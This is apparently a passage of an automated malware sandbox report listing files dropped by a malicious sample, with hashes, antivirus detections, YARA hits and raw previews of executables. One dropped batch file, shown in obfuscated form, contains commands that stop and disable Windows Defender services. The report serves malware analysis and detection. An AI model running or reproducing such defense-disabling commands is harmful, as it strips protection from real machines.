SHA-512:	1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 80%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2CF4.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1111994
Entropy (8bit):	7.9252602794269915
Encrypted:	false
SSDEEP:	24576:4CRVwOoPzND9Tl7RUGb+89w4ZFLkAPLYLSeUr:hOhJGTIAAcns
MD5:	27E7D6FAA08A1A69CB7C62D199B1B4F6
SHA1:	507F02D50BA701760A6D2303A648563030FB3ECD
SHA-256:	3896AD778346B9D5B04331410015969F2AF655B6277DBF612721027B73173E50
SHA-512:	7100ED807C5C1C56D5A3FCB4E69BE326F5D14BC44076E2E35355E6B8E3A175ED1B9FF4BC9C82FBCB1C19D1DD552E1D9242CD17CD5C44F9320C067ACA301D1059
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j@...!.R.!.R.!.R'Y.R4!.R'Y.R.!.R'Y.R=!.R.!.R.!.R'Y.Ry!.R'Y.R/!.R'Y.R/!.R'Y.R/!.RRich.!.R........PE..L....ALV.....................~......\.............@..........................`..........................................3...............xE..........................................................@...@...............(............................text...)........................... ..`.rdata...F.......H..................@..@.data...(.... ......................@....rsrc...xE.......F..."..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\31F4.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	859648
Entropy (8bit):	2.9241367623104355
Encrypted:	false
SSDEEP:	6144:pkY0668MzX0oJgx6nrBdkBSrBHHHI6t7af9GH0WbcSDkTDhm6Xpic76vneCVvK36:phHmzXaNIWsUwgrNt1E/Z
MD5:	AB823DF932B3C2941A9015848EBDB97B
SHA1:	A7E2D46ADA3A42A3D32A96937C316340F2E62A5B
SHA-256:	812D78A50A8DE210DBBCE12FDA210461770B8B928F8B3249DE80ECB68055F61E
SHA-512:	59AC83CED7E0A68E7491812B494E715FC19BA2AA25EDBC0B5765792A1DC19432DBF8F5B671EA4EEBF590740C63EE1A50FE4B0FC716B986F6C5070B920F5C2325
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.\|a.........."...0..............1... ........@.. ....................................`..................................1..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H............D......Q...................................................V#... ..A#... ..A&&...0.......... QB.o.......(....&..0.......... .n.m.......(....&..0..J.........(....+.~.....(....,.........+..+........(....(.........(....(.........*...0..........(....(.....% t..(...+.....% .g..(...+.....% ..0.(...+...... H.NB(...+.....% .z..(...+.....% [/}h(...+.....% ....(...+.....% M.3(...+.....% ....(...+.....% ....(...+.....% _.C.(...+.....% ..&d(...+..... ...}(...++". ...

C:\Users\user\AppData\Local\Temp\39A7.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	604160
Entropy (8bit):	7.081312542094628
Encrypted:	false
SSDEEP:	12288:zUq737aTz5aNquRVgE6/kEObrF5d/WYN4t88+wGOjsyDR:Aq7rwa0uRm8brF5LupDs
MD5:	DE692F1B4D4C63FED395BE25E878858E
SHA1:	16F5B74E898FB0CD30F127CB1E03DA79E481158A
SHA-256:	6ED753E5B9A7AC5D89A6F9749E24C5BEB7483C6FDA2057E81E1EB3ED5A32AB21
SHA-512:	24227BBCD1451E7F6A2B6C16637987B1388BE398A88005851AF24805BFD7B57AE39AE7B70E69DE3B424EE48E4FB65EF0CABD710692EBC9393F2A1542E6D8E067
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.>.T.m.T.m.T.m."2m.T.m.".m.T.m."3mqT.m.,.m.T.m.T.m.T.m."6m.T.m.".m.T.m.".m.T.mRich.T.m........PE..L.....*_......................v.....@.............@...........................~......4..........................................d....P}..I....................}..... ...................................@............................................text.............................. ..`.data...H.u.........................@....rsrc....I...P}..J..................@..@.reloc...#....}..$..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3C84.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	161280
Entropy (8bit):	5.163359140538006
Encrypted:	false
SSDEEP:	3072:hj1+ax5s9jVultxyIAMzTjSMzTjoIe1UhCp:hJqjVoeN
MD5:	9FA070AF1ED2E1F07ED8C9F6EB2BDD29
SHA1:	6E1ACD6CB17AB64AC6DBF0F4400C649371B0E3BD
SHA-256:	08D67F957EC38E92301EEAAAF2759EF2A070376239EAD25864C88F3DD31EAB8C
SHA-512:	14A1CD1090A2ECCEA3B654EEE2B7D4DE390219F8C3C200D97D2AB431311BDF24B1B40F2F38E78804AD286654CD33DFB515704C9B863DAF0786A0D633F05C9BF2
Malicious:	true
Yara Hits:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\3C84.exe, Author: Florian Roth
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P..l.............. ........@.. ...................................@.....................................O....................x............................................................... ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B.......................H.......(u..t.......A...HL...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...

C:\Users\user\AppData\Local\Temp\3D90.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	788480
Entropy (8bit):	7.375476790857557
Encrypted:	false
SSDEEP:	12288:7BvuWZ1hYCLgPG2UttOE4rgC2ikfbhO0abXLdEMqn2ynQhHZ+CHf+zqR/QhcjK:FvT3YCUGXOGjO0oXn3VvR
MD5:	5403293AF4550DF76CA5F2D9C5A3FC92
SHA1:	32CFBC5855A3F83B51DC1D5E03FE42B1409D5ED0
SHA-256:	20725EE30E6DD4A06A4850BD364EF3DDDBD3A0DFB8EDA7EBE18EDA719CE28383
SHA-512:	B80C24870166B1CB1BB0746884A8FA8060096AE62DA951190B2D6F551065D4AAF7CE180DCB02D1C96652F2991374DAC7FF0C1EC2839851B9F5F32FFE1A3ED311
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.m.m.m..2m..m...m..m..3mq..m...m...m.m...m..6m...m...m...m...m...mRich.m................PE..L...U._......................p.....`.............@...........................{......"......................................$...d.... z..<...................`z.....0................................}..@............................................text...X........................... ..`.data....io.........................@....vinelog......z.....................@....rsrc....<... z..<..................@..@.reloc...#...`z..$..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\46D6.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	347136
Entropy (8bit):	5.994706914620217
Encrypted:	false
SSDEEP:	6144:5rT+Wp+Ouiv24iPmSCyf11rcrKElOoL91iH+2k9Q9:5H/p+Ouiv24gf11rcrKElOSiH
MD5:	31BE6099D31BDBF1ED339EFFDC1C7064
SHA1:	6B1077BE6CF57EA98C3BE8B6F0268D025EA72D88
SHA-256:	9D9056D76BE4BEB3CC17CD95C47108AB42D73255F2BC031423D044ED927FB885
SHA-512:	ECC057643C2E65C74F3286C8856EB57FEC75FCB650FBE864D53EC0C36C34E0DA3242E19657B1ABB75AA3EEE88A7367E77FFC0E3FE98BFEF0D180C74966D1CEDE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 57%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p.e.p.e.p.e....\.e.....R.e.....e.y...w.e.p.d...e....q.e.....q.e.....q.e.Richp.e.........................PE..L...g.._......................p.....p.............@...........................t.................................................P....`s.h?....................s.....0..................................@............................................text... ........................... ..`.data....io.........................@....daya........Ps.....................@....rsrc...h?...`s..@..................@..@.reloc...#....s..$...(..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5483.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	600576
Entropy (8bit):	7.085821043168137
Encrypted:	false
SSDEEP:	12288:uKyhfDDIqy8V4RVZBhrMAi61KGY73rxAlITWa/c6SK4kM8:OZ5Ra3ZBhgqUZ7xAGTph4
MD5:	05F6A0E8F711FABBBB97A544F92FC25C
SHA1:	CB3F23C411A215093E77B532B9A4BC7C8A50B326
SHA-256:	CFA7B4B4FC55791D6FE487F6945550AF8B4E76B7642C417498AD519131C70E66
SHA-512:	C2E18B358EE56DB805F21AF3D9E81DE2732C4E8675B68CC4CC79D23C3C6DD17CFB10DD7D32BE9AD615A20849C4E8F5ACFF6A75BD5652DFF6BF5068900482DA5F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..C4w.C4w.C4w.,B..n4w.,B..a4w.,B..<4w.JL..D4w.C4v.=4w.,B..B4w.,B..B4w.,B..B4w.RichC4w.................PE..L......^......................p...................@...........................x................................................P....@w..?....................w.8...0...............................P...@............................................text............................... ..`.data....io.........................@....ziwer.......0w.....................@....rsrc....?...@w..@..................@..@.reloc..."....w..$..................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\31F4.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	859648
Entropy (8bit):	2.9241367623104355
Encrypted:	false
SSDEEP:	6144:pkY0668MzX0oJgx6nrBdkBSrBHHHI6t7af9GH0WbcSDkTDhm6Xpic76vneCVvK36:phHmzXaNIWsUwgrNt1E/Z
MD5:	AB823DF932B3C2941A9015848EBDB97B
SHA1:	A7E2D46ADA3A42A3D32A96937C316340F2E62A5B
SHA-256:	812D78A50A8DE210DBBCE12FDA210461770B8B928F8B3249DE80ECB68055F61E
SHA-512:	59AC83CED7E0A68E7491812B494E715FC19BA2AA25EDBC0B5765792A1DC19432DBF8F5B671EA4EEBF590740C63EE1A50FE4B0FC716B986F6C5070B920F5C2325
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.\|a.........."...0..............1... ........@.. ....................................`..................................1..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H............D......Q...................................................V#... ..A#... ..A&&...0.......... QB.o.......(....&..0.......... .n.m.......(....&..0..J.........(....+.~.....(....,.........+..+........(....(.........(....(.........*...0..........(....(.....% t..(...+.....% .g..(...+.....% ..0.(...+...... H.NB(...+.....% .z..(...+.....% [/}h(...+.....% ....(...+.....% M.3(...+.....% ....(...+.....% ....(...+.....% _.C.(...+.....% ..&d(...+..... ...}(...++". ...

C:\Users\user\AppData\Local\Temp\69B.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	512512
Entropy (8bit):	7.846723941917503
Encrypted:	false
SSDEEP:	12288:Tw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+LF:TVhdLVg2Zep7njXzPDxC+J
MD5:	F57B28AEC65D4691202B9524F84CC54A
SHA1:	F546B20EB40E3BC2B6929BA0F574E32422CED30C
SHA-256:	87D86132095541ED3B5FE05EB06692E1712287B6FFD9832A28EB85F52B55F0A5
SHA-512:	1A773186B0A15F743F8D9681036A9ECA45E2DD5F7944725498E929C5438ACFFCD753061EB475383E5759FC41A8ADE4EB717F3D3529313C3C0D48C659B5E36F09
Malicious:	true
Yara Hits:	Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\69B.exe, Author: Florian Roth
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.................. ........@.. .......................@............`.....................................S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H........u...p..........HZ..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................

C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\3C84.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91000
Entropy (8bit):	6.241345766746317
Encrypted:	false
SSDEEP:	1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5:	17FC12902F4769AF3A9271EB4E2DACCE
SHA1:	9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256:	29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512:	036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....).....)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat Download File
Process:	C:\Users\user\AppData\Local\Temp\3C84.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8399
Entropy (8bit):	4.665734428420432
Encrypted:	false
SSDEEP:	192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5:	B2A5EF7D334BDF866113C6F4F9036AAE
SHA1:	F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256:	27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512:	8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious:	false
Reputation:	unknown
Preview:	@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr

C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\69B.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91000
Entropy (8bit):	6.241345766746317
Encrypted:	false
SSDEEP:	1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5:	17FC12902F4769AF3A9271EB4E2DACCE
SHA1:	9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256:	29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512:	036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....).....)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat Download File
Process:	C:\Users\user\AppData\Local\Temp\69B.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8399
Entropy (8bit):	4.665734428420432
Encrypted:	false
SSDEEP:	192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5:	B2A5EF7D334BDF866113C6F4F9036AAE
SHA1:	F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256:	27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512:	8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious:	false
Reputation:	unknown
Preview:	@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr

C:\Users\user\AppData\Local\Temp\9415.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1988096
Entropy (8bit):	7.7086203175437165
Encrypted:	false
SSDEEP:	49152:ohd3Tj7SWTE9/55l9+x9Cezn3afUFp1uNUe9T8XuoBqhnYD:oDDnE9/9Ux9CebCUVQR8XLq
MD5:	499FA9D12CBC441BF050DAD9FBB64D82
SHA1:	583795FF70365EEB4CD455F27DF5C07A2B6DCC90
SHA-256:	8F4FE47FB7509649380A1562119AEC4044C2C57CFC8CEBAA2EF759ADA13FC8A1
SHA-512:	C406097565CD6235F8E7BA171A593F1DE11F37744AA57D84DC4B28AC5A48192210D0EB23F1C54A3568CDADCD3C5D48DEE3F34ADC4CFA18F81597E8AC04439D37
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7\|a..............0..B...........`... ........@.. ....................................@..................................`..O.................................................................................... ............... ..H............text....@... ...B.................. ..`.rsrc................D..............@..@.reloc...............T..............@..B.................`......H........Y...q...........................................................0..2..........o ....+..o!.......o"......o....-....,..o.................&........{...."..}....".(#......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}......{...."..}....".($.......0..#........($...........,.r...ps%...z..}......0.............s&....+......0..C.........o'...(y.........((....."...%...o).........%...%...(...t!....+..*..0.............(

C:\Users\user\AppData\Local\Temp\9A4B.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	345600
Entropy (8bit):	6.00444102247045
Encrypted:	false
SSDEEP:	6144:hMWtEljhtc0RTw3uc82o2SeDFDkgYXlUk:hxtEljc0RTwec82o2S2DkgY
MD5:	DBD80FF6104BC503DD52179301E3F75F
SHA1:	A392B62E4A89EBD014ADA16D43ADCDD61D4465C2
SHA-256:	A811C4187D3965AAEC46BC83DD0518E398412E9DFCE8817CB03623E6AFCDC4DF
SHA-512:	2D802655C38DE45B605E44B64DA1B8CE8ACC9549DEEE16A59EFEC9313711CB2DF4921B8E0B9F0F1301BFF068C50E40C871E963A42519466D388CE5C91D36E631
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U..C4w.C4w.C4w.,B..n4w.,B..a4w.,B..<4w.JL..D4w.C4v.=4w.,B..B4w.,B..B4w.,B..B4w.RichC4w.................PE..L...y.._......................p...................@...........................t............................................$...P....`s..?....................s.<...0...................................@............................................text...H........................... ..`.data....io.........................@....lopaba......Ps.....................@....rsrc....?...`s..@..................@..@.reloc..."....s..$..."..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_215qa3ne.mzc.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ck5mlaxk.0rr.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlspyrsg.21m.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5osv45a.saj.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Roaming\abbavbe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	347136
Entropy (8bit):	5.994706914620217
Encrypted:	false
SSDEEP:	6144:5rT+Wp+Ouiv24iPmSCyf11rcrKElOoL91iH+2k9Q9:5H/p+Ouiv24gf11rcrKElOSiH
MD5:	31BE6099D31BDBF1ED339EFFDC1C7064
SHA1:	6B1077BE6CF57EA98C3BE8B6F0268D025EA72D88
SHA-256:	9D9056D76BE4BEB3CC17CD95C47108AB42D73255F2BC031423D044ED927FB885
SHA-512:	ECC057643C2E65C74F3286C8856EB57FEC75FCB650FBE864D53EC0C36C34E0DA3242E19657B1ABB75AA3EEE88A7367E77FFC0E3FE98BFEF0D180C74966D1CEDE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4...p.e.p.e.p.e....\.e.....R.e.....e.y...w.e.p.d...e....q.e.....q.e.....q.e.Richp.e.........................PE..L...g.._......................p.....p.............@...........................t.................................................P....`s.h?....................s.....0..................................@............................................text... ........................... ..`.data....io.........................@....daya........Ps.....................@....rsrc...h?...`s..@..................@..@.reloc...#....s..$...(..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\hjwfgwu Download File
